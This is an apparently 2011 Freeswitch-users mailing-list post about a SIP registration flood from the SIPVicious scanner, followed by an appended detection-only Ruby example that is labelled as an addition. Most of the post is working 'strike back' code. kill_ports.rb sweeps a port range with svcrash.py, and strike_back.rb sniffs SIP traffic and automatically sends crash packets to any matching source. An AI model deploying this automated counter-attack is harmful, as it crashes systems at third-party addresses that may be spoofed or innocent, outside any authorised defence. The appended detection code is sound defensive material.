[Freeswitch-users] SPIT attack and how to strike back
Peter P GMX
Prometheus001 at gmx.net
Thu Apr 21 03:00:48 MSD 2011
Hello all,
I would like to share this with you as you may have also been affected
by this threat.
Yesterday we received a SPIT attack to our Freeswitch servers. We had
about 50 register requests/sec. We noticed this as we saw a slight
increase in the load of the Freeswitch servers. Fortunately Freeswitch
can handle a huge amount of register requests so we had no denial of
service.
You can identify this attack by finding the following in the Register
message:
User-Agent: friendly-scanner
How to get rid of it:
The attacker used Sipvicious (friendly-scanner). Sipvicious itself has a
nice tool "svcrash.py" which can send a malformed packet back to the
attacker which crashes their own Sipvicious tool. You can issue this tool by
python svcrash.py -d <host of attacker> -p <port of attacker>
You will need port 5060 on your machine to work. But there is also a
workaround for that. svcrash.py will show how to overcome this if your
port 5060 is not available.
Download it here
http://sipvicious.googlecode.com/files/sipvicious-0.2.6.tar.gz and
unpack it to a folder of your choice.
I wrote a small Ruby script to send the packet back to a port range, as
our attacker used some dozens of ports to send.
Here is the script (Install ruby first by "apt-get install ruby" e.g. on
Debian based systems). Put it into the sipvicious directory
kill_ports.rb:
#!/usr/bin/env ruby
# Usage: ./kill_ports.rb <host> <from_port> <to_port>
host=ARGV[0]
start_port=ARGV[1].to_i
end_port=ARGV[2].to_i
# Run svcrash.py once for every port in the given range
start_port.upto(end_port) do |port|
  cmd="python svcrash.py -d #{host} -p #{port}"
  p cmd
  erg=`#{cmd}`
  p erg
end
You now can run it by
./kill_ports.rb <ip> <from_port> <to_port>
By using this tool we got rid of most of the SPIT messages. But after a
while they started again to attack us from different ports.
The next step is: Why not automate this by trying to identify host and
port automatically and send back the svcrash.py packet to the sender's port?
First install the pcap library
apt-get install libpcap-dev libpcap-ruby
Then I wrote the following tool to automate this; it makes use of the
kill_ports.rb above:
strike_back.rb:
#!/usr/bin/env ruby
# I used some code from http://snippets.dzone.com/posts/show/5931
require 'pcaplet'
require 'logger'
require 'timeout'

@timeout=3600 # max runtime: 1 hour
@logfile='strike_back.log'

# Logger that echoes every message to stdout and writes it unformatted to the logfile
class AuditLogger < Logger
  def format_message(severity, timestamp, progname, msg)
    puts msg
    "#{msg}\n"
  end
end

logfile = File.open(@logfile, 'a')
LOGGER = AuditLogger.new(logfile)
LOGGER.level = Logger::INFO

search="friendly-scanner"
puts "Searching for '#{search}' in SIP packets"

# Capture only UDP traffic destined for the SIP port
$network = Pcaplet.new('-s 1500')
$filter = Pcap::Filter.new('udp and dst port 5060', $network.capture)
$network.add_filter($filter)

puts "Logfile: #{@logfile}"
puts "Starting capture..."
begin
  Timeout.timeout(@timeout) do # 3600 sec
    for p in $network
      header = "#{Time.now.strftime("%Y-%m-%d %H:%M:%S")} #{p.src}:#{p.sport} => #{p.dst}:#{p.dport}"
      if $filter =~ p
        #puts "simple search"
        # Look for the scanner's User-Agent string in the UDP payload
        if p.udp_data.index(search)
          LOGGER.info "Kill Friendly scanner #{p.src} with Source Port #{p.sport}"
          cmd="./kill_ports.rb #{p.src} #{p.sport} #{p.sport}"
          erg=`#{cmd}`
          p erg
          LOGGER.info header
          LOGGER.info p.udp_data
        end
      end
    end
  end
rescue Timeout::Error
  logfile.flush
  puts "Timeout - finished."
end
There may be a better way to code this, but at least it worked. After
about 15min the number of attacks went to 0.
Disclaimer: You can damage other systems by using these tools. So be
careful and use at your own risk. Do not use this tool for attacking
other systems!
Best regards
Peter
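A detection-only counterpart to the capture script above, added here as an example and not part of the original post: it parses REGISTER messages the way the "udp and dst port 5060" filter would deliver them, flags the friendly-scanner User-Agent, and also flags any source exceeding a per-second REGISTER rate (the attack described above ran at about 50/sec). The packet tuples, the addresses and pbx.example.net are constructed sample data; nothing is sent back.

```ruby
# Added detection-only example (not from the original post): flag sources whose
# REGISTERs carry the SIPVicious User-Agent or arrive above a per-second rate.
SCANNER_UA = /friendly-scanner/i

# Build a constructed REGISTER request; pbx.example.net and the addresses are made up.
def register(ip, port, ua)
  "REGISTER sip:pbx.example.net SIP/2.0\r\n" \
  "Via: SIP/2.0/UDP #{ip}:#{port};branch=z9hG4bK1\r\n" \
  "From: <sip:100@pbx.example.net>\r\nTo: <sip:100@pbx.example.net>\r\n" \
  "User-Agent: #{ua}\r\nContent-Length: 0\r\n\r\n"
end

# Constructed capture: [epoch_second, src_ip, src_port, udp_payload].
SAMPLE_PACKETS =
  [[1000, "203.0.113.9", 5060, register("203.0.113.9", 5060, "Desk Phone 1.0")]] +
  (0...4).map  { |i| [1000, "198.51.100.7", 5060 + i, register("198.51.100.7", 5060 + i, "friendly-scanner")] } +
  (0...55).map { |i| [1001, "198.51.100.23", 40000 + i, register("198.51.100.23", 40000 + i, "unknown")] }

# Parse the request line and headers (header names are case-insensitive in SIP).
def parse_sip(payload)
  lines = payload.split(/\r?\n\r?\n/, 2).first.to_s.split(/\r?\n/)
  headers = {}
  lines.drop(1).each do |line|
    name, value = line.split(":", 2)
    headers[name.strip.downcase] = value.strip if value
  end
  { method: lines.first.to_s.split(" ").first, headers: headers }
end

# Returns { src_ip => { reasons: [...], ports: [...] } } for sources that
# advertise the scanner User-Agent or exceed `rate` REGISTERs in one second.
def suspicious_sources(packets, rate: 50)
  per_ip = Hash.new { |h, k| h[k] = { reasons: [], ports: [], per_sec: Hash.new(0) } }
  packets.each do |sec, ip, port, payload|
    msg = parse_sip(payload)
    next unless msg[:method] == "REGISTER"
    e = per_ip[ip]
    e[:ports] |= [port]
    e[:per_sec][sec] += 1
    e[:reasons] |= ["scanner user-agent"] if msg[:headers]["user-agent"] =~ SCANNER_UA
  end
  per_ip.each_with_object({}) do |(ip, e), out|
    peak = e[:per_sec].values.max
    e[:reasons] |= ["register flood (#{peak}/s)"] if peak >= rate
    out[ip] = { reasons: e[:reasons], ports: e[:ports].sort } unless e[:reasons].empty?
  end
end

suspicious_sources(SAMPLE_PACKETS).each { |ip, i| puts "#{ip} #{i[:reasons].join('; ')} ports=#{i[:ports].size}" }
```

The flood check catches a scanner that rotates its User-Agent, which the string match alone would miss; the flagged source ports are what a firewall rule or log search would need.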